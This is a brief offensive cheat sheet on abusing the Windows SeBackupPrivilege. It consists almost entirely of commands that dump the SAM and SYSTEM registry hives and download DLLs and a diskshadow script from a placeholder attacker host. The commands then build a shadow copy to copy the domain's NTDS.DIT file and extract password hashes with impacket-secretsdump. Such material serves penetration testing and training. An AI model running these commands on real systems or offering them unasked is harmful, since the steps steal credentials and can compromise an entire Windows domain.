The SeBackupPrivilege can be used for privilege escalation because it allows a user to bypass file system security restrictions by enabling them to perform backup operations, including reading any file or directory on the system regardless of its permissions.
1. Dump SAM
1
| reg save HKLM\SAM C:\Windows\temp\SAM.bak
|
2. Dump SYSTEM
1
| reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM.bak
|
3. Dump NTDS.DIT
- Download SeBackupPrivilegeCmdLets.dll.
- Download SeBackupPrivilegeUtils.dll.
- Create
vss.dsh:1
2
3
4
5
6
| set context persistent nowriters
set metadata c:\\programdata\\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:
|
Execution:
1
2
3
4
5
6
7
8
| iwr -uri http://<ATTACKER_HOST>/SeBackupPrivilegeCmdLets.dll -outfile C:\Windows\temp\SeBackupPrivilegeCmdLets.dll
iwr -uri http://<ATTACKER_HOST>/SeBackupPrivilegeUtils.dll -outfile C:\Windows\temp\SeBackupPrivilegeUtils.dll
iwr -uri http://<ATTACKER_HOST>/vss.dsh -outfile C:\Windows\temp\vss.dsh
cd "C:\Windows\temp"
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
diskshadow /s C:\\Windows\\temp\\vss.dsh
Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit C:\\Windows\\temp\\NTDS.DIT.bak
|
4. Read Locally via Attacker Machine using Impacket
1
| impacket-secretsdump -sam SAM.bak -system SYSTEM.bak -ntds NTDS.DIT.bak LOCAL
|